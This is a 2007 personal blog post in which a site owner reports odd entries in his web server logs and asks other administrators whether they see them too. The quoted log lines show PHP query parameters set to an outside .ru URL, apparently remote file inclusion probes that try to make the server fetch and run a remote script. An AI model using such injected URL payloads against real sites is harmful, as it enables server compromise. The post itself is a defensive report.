Bauani's Historical Blog

Opinion on Issue(s) Which I, Ahamed Bauani Think About or Went Through It. Other Then That It Will Have Any Kind of News and Information Which I Think Useful for My Friends and Others in World. Oh, One more thing. I am currently not maintaining this blog anymore. To visit my new Blog, please Click Here -- Ahamed Bauani



Important information to Readars : This Blog is No Longer Maintaining by Bauani


Please Change your Bookmark to http://blog.bauani.org/ to get regular update from Ahamed Bauani Or

Subscribe to This RSS Feed to get Update of Bauani's New Blog

Monday, November 12, 2007

Strange Entry on webserver log file new warm or virus?



Today I found some strange activity and request on a web server log. I decided to discover the request pattern. Then I check some of different website log on same and different web server. Seems there is any new warm or virus spreading in world... Some Entry from web log:

"GET /filter-news/index.php?v=http://amygirl.chat.ru/images/image.txt? HTTP/1.1" 200 69305 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
"GET /detail/index.php?pageNum_RsFooterNews=http://amygirl.chat.ru/images/image.txt? HTTP/1.1" 200 65360 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
"GET /filter-news/index.php?v=http://amygirl.chat.ru/images/image.txt? HTTP/1.1" 200 69305 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
"GET /filter-news/index.php?v=http://amygirl.chat.ru/images/image.txt? HTTP/1.1" 200 68900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
"GET /detail/index.php?pageNum_RsFooterNews=http://amygirl.chat.ru/images/image.txt? HTTP/1.1" 200 65360 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"

And a lot of entry that requesting on some PHP script to collect various HTTP:// URL. Request coming from different IP address, requesting different .php files/scripts and different HTTP URL. The interesting thing is all the URL is having domain .RU TLD.

This type of request on web server is creating high load on CPU usages on server. I have seen a lot of request of this kind, on different server, different web site, different location.

Any one having this problem ? I am sure you have. Check your web server log and tell me the story....

Thanks

Ahamed Bauani

0 Comments:

Post a Comment

Links to this post:

Create a Link

<< Home